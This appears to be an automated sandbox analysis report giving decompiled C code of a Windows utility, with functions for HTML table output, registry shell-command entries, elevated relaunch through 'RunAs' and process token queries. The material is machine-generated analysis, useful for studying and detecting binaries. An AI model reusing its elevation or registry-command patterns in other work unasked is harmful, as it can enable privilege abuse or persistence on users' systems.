						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                0x00407763
                                                                                                                0x0040776c
                                                                                                                0x00407784
                                                                                                                0x0040778b
                                                                                                                0x00407797
                                                                                                                0x00407799
                                                                                                                0x0040779b
                                                                                                                0x004077a7
                                                                                                                0x004077ae
                                                                                                                0x004077bd
                                                                                                                0x004077c4
                                                                                                                0x004077d3
                                                                                                                0x004077da
                                                                                                                0x004077e1
                                                                                                                0x004077e6
                                                                                                                0x004077f2
                                                                                                                0x004077f5
                                                                                                                0x00407804
                                                                                                                0x00407805
                                                                                                                0x00407810
                                                                                                                0x00407812
                                                                                                                0x00407813
                                                                                                                0x00407818
                                                                                                                0x00407818
                                                                                                                0x00407825
                                                                                                                0x0040782d
                                                                                                                0x00407830
                                                                                                                0x0040783a
                                                                                                                0x00407840
                                                                                                                0x00407846
                                                                                                                0x00407849
                                                                                                                0x00407850
                                                                                                                0x0040785e
                                                                                                                0x00407864
                                                                                                                0x00407867
                                                                                                                0x0040786b
                                                                                                                0x0040786f
                                                                                                                0x00407877
                                                                                                                0x0040787a
                                                                                                                0x00407885
                                                                                                                0x00407892
                                                                                                                0x004078a8
                                                                                                                0x004078b8
                                                                                                                0x004078c5
                                                                                                                0x004078ff
                                                                                                                0x004078c7
                                                                                                                0x004078ca
                                                                                                                0x004078dd
                                                                                                                0x004078de
                                                                                                                0x004078e3
                                                                                                                0x004078e8
                                                                                                                0x004078eb
                                                                                                                0x004078f0
                                                                                                                0x004078f0
                                                                                                                0x00407906
                                                                                                                0x00407909
                                                                                                                0x0040790f
                                                                                                                0x0040791d
                                                                                                                0x00407923
                                                                                                                0x0040792d
                                                                                                                0x00407932
                                                                                                                0x0040793b
                                                                                                                0x00407942
                                                                                                                0x00407943
                                                                                                                0x0040794c
                                                                                                                0x00407953
                                                                                                                0x00407954
                                                                                                                0x00407959
                                                                                                                0x0040795c
                                                                                                                0x00407961
                                                                                                                0x0040796c
                                                                                                                0x00407971
                                                                                                                0x0040797a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00407838
                                                                                                                0x00407838
                                                                                                                0x0040783a
                                                                                                                0x00407980
                                                                                                                0x0040798a
                                                                                                                0x004079a1

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 40%
                                                                                                                			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                0x00407b65
                                                                                                                0x00407b7c
                                                                                                                0x00407b83
                                                                                                                0x00407b91
                                                                                                                0x00407b98
                                                                                                                0x00407ba6
                                                                                                                0x00407bad
                                                                                                                0x00407bb2
                                                                                                                0x00407bb9
                                                                                                                0x00407bca
                                                                                                                0x00407bcb
                                                                                                                0x00407bd6
                                                                                                                0x00407bdb
                                                                                                                0x00407bdc
                                                                                                                0x00407be1
                                                                                                                0x00407be1
                                                                                                                0x00407be8
                                                                                                                0x00407bf9
                                                                                                                0x00407bfa
                                                                                                                0x00407c05
                                                                                                                0x00407c0a
                                                                                                                0x00407c0b
                                                                                                                0x00407c1c
                                                                                                                0x00407c21
                                                                                                                0x00407c21
                                                                                                                0x00407c2a
                                                                                                                0x00407c2b
                                                                                                                0x00407c36
                                                                                                                0x00407c3b
                                                                                                                0x00407c3c
                                                                                                                0x00407c41
                                                                                                                0x00407c51
                                                                                                                0x00407c56
                                                                                                                0x00407c5b
                                                                                                                0x00407c65
                                                                                                                0x00407c68
                                                                                                                0x00407c6b
                                                                                                                0x00407c74
                                                                                                                0x00407c7b
                                                                                                                0x00407c80
                                                                                                                0x00407c82
                                                                                                                0x00407c88
                                                                                                                0x00407ca6
                                                                                                                0x00407c8a
                                                                                                                0x00407c8a
                                                                                                                0x00407c8b
                                                                                                                0x00407c96
                                                                                                                0x00407c9b
                                                                                                                0x00407c9c
                                                                                                                0x00407ca1
                                                                                                                0x00407ca1
                                                                                                                0x00407cb3
                                                                                                                0x00407cb4
                                                                                                                0x00407cbd
                                                                                                                0x00407cc4
                                                                                                                0x00407cc5
                                                                                                                0x00407cd0
                                                                                                                0x00407cd5
                                                                                                                0x00407cd6
                                                                                                                0x00407cdb
                                                                                                                0x00407ceb
                                                                                                                0x00407cf0
                                                                                                                0x00407cf3
                                                                                                                0x00407cf3
                                                                                                                0x00407cf3
                                                                                                                0x00000000
                                                                                                                0x00407cfc
                                                                                                                0x00407d00

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                0x00404415
                                                                                                                0x0040441d
                                                                                                                0x0040442c
                                                                                                                0x00404435
                                                                                                                0x004045b3
                                                                                                                0x004045b7
                                                                                                                0x004045b7
                                                                                                                0x0040444b
                                                                                                                0x00404452
                                                                                                                0x00404457
                                                                                                                0x00404460
                                                                                                                0x00404461
                                                                                                                0x00404462
                                                                                                                0x0040446d
                                                                                                                0x00404472
                                                                                                                0x00404473
                                                                                                                0x00404490
                                                                                                                0x004044a5
                                                                                                                0x004044b4
                                                                                                                0x004044b6
                                                                                                                0x004044b7
                                                                                                                0x004044bd
                                                                                                                0x004044cf
                                                                                                                0x004044db
                                                                                                                0x004044eb
                                                                                                                0x004044f1
                                                                                                                0x004044f6
                                                                                                                0x004044f9
                                                                                                                0x004044fe
                                                                                                                0x00404506
                                                                                                                0x00404507
                                                                                                                0x00404508
                                                                                                                0x00404510
                                                                                                                0x00404521
                                                                                                                0x00404532
                                                                                                                0x00404539
                                                                                                                0x00404547
                                                                                                                0x0040454e
                                                                                                                0x0040455b
                                                                                                                0x0040455c
                                                                                                                0x00404564
                                                                                                                0x0040456f
                                                                                                                0x00404570
                                                                                                                0x00404571
                                                                                                                0x0040457c
                                                                                                                0x0040457d
                                                                                                                0x00404588
                                                                                                                0x00404589
                                                                                                                0x0040458a
                                                                                                                0x004045a0
                                                                                                                0x004045a5
                                                                                                                0x00404521
                                                                                                                0x004044eb
                                                                                                                0x004045ab
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404452
                                                                                                                • _snwprintf.MSVCRT ref: 00404473
                                                                                                                  • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                  • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                  • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                • memset.MSVCRT ref: 004044CF
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                • memset.MSVCRT ref: 00404539
                                                                                                                • memset.MSVCRT ref: 0040454E
                                                                                                                • _snwprintf.MSVCRT ref: 00404571
                                                                                                                • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                  • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                • API String ID: 486436031-734527199
                                                                                                                • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                0x00406466
                                                                                                                0x0040647d
                                                                                                                0x00406484
                                                                                                                0x00406499
                                                                                                                0x004064a0
                                                                                                                0x004064af
                                                                                                                0x004064b4
                                                                                                                0x004064bb
                                                                                                                0x004064cd
                                                                                                                0x004064d2
                                                                                                                0x004064d4
                                                                                                                0x004064e4
                                                                                                                0x004064ea
                                                                                                                0x004064ea
                                                                                                                0x004064f3
                                                                                                                0x00406503
                                                                                                                0x00406514
                                                                                                                0x00406525
                                                                                                                0x0040653b
                                                                                                                0x0040654e
                                                                                                                0x00406568
                                                                                                                0x00406572
                                                                                                                0x0040657a
                                                                                                                0x00406582
                                                                                                                0x0040658a
                                                                                                                0x00406596

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406484
                                                                                                                • memset.MSVCRT ref: 004064A0
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                  • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                  • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                  • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                • wcscpy.MSVCRT ref: 004064E4
                                                                                                                • wcscpy.MSVCRT ref: 004064F3
                                                                                                                • wcscpy.MSVCRT ref: 00406503
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                • wcscpy.MSVCRT ref: 0040657A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3037099051-2314623505
                                                                                                                • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}












                                                                                                                0x00401c31
                                                                                                                0x00401c33
                                                                                                                0x00401c48
                                                                                                                0x00401c4f
                                                                                                                0x00401c61
                                                                                                                0x00401c68
                                                                                                                0x00401c74
                                                                                                                0x00401c79
                                                                                                                0x00401c7a
                                                                                                                0x00401c7b
                                                                                                                0x00401c84
                                                                                                                0x00401c89
                                                                                                                0x00401c8e
                                                                                                                0x00401c8f
                                                                                                                0x00401c9b
                                                                                                                0x00401ca6
                                                                                                                0x00401caf
                                                                                                                0x00401cb9
                                                                                                                0x00401cc0
                                                                                                                0x00401cc7
                                                                                                                0x00401cce
                                                                                                                0x00401cd5
                                                                                                                0x00401cdd
                                                                                                                0x00401ce0
                                                                                                                0x00401d14
                                                                                                                0x00401ce2
                                                                                                                0x00401ce8
                                                                                                                0x00401cf3
                                                                                                                0x00401cfe
                                                                                                                0x00401d09
                                                                                                                0x00401d09
                                                                                                                0x00401cfe
                                                                                                                0x00401d1b

                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                • memset.MSVCRT ref: 00401C4F
                                                                                                                • memset.MSVCRT ref: 00401C68
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                • memset.MSVCRT ref: 00401C9B
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                                                • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                • API String ID: 903100921-3385179869
                                                                                                                • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
